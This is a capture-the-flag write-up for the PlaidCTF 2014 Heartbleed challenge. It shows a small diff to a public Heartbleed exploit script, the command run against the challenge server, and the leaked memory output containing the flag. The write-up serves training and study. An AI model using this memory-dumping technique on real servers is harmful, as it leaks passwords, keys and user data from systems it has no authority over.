PlaidCTF Quals 2014 misc-10: Heartbleed

Back up now! Hopefully for good.
Our hearts are bleeding. But instead of bleeding password bytes, they’re bleeding flags. Please recover our flags so we don’t bleed to death before we can update to 1.0.1-g. Site is up at https://54.82.147.138:45373

According to name of challenge – we have CVE-2014-0160-vulnerable host. Lets check it via heartbleed-test.

So we can dump memory of vulnerable server. To do this, I chose Samiux’s version of heartbleed exploit. It’s looking for interesting information in a memory dump, but since we’d better get all the memory, change the code a bit.

➜  heartbleed  diff -p heartbleed-samiux-orig.py heartbleed-samiux.py
*** heartbleed-samiux-orig.py	2014-04-14 11:35:26.000000000 +0300
--- heartbleed-samiux.py	2014-04-14 11:37:49.000000000 +0300
*************** class HeartBleeder(object):
*** 137,142 ****
--- 137,143 ----
                      return None
                  rdata += data
                  remain -= len(data)
+         print rdata
          return rdata
 
      def try_heartbeat(self, hb):

➜  heartbleed  python heartbleed-samiux.py 54.82.147.138 -p 45373 | grep flag
@flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}flag{hey_guise_we_made_a_heartbleed}

The flag is hey_guise_we_made_a_heartbleed.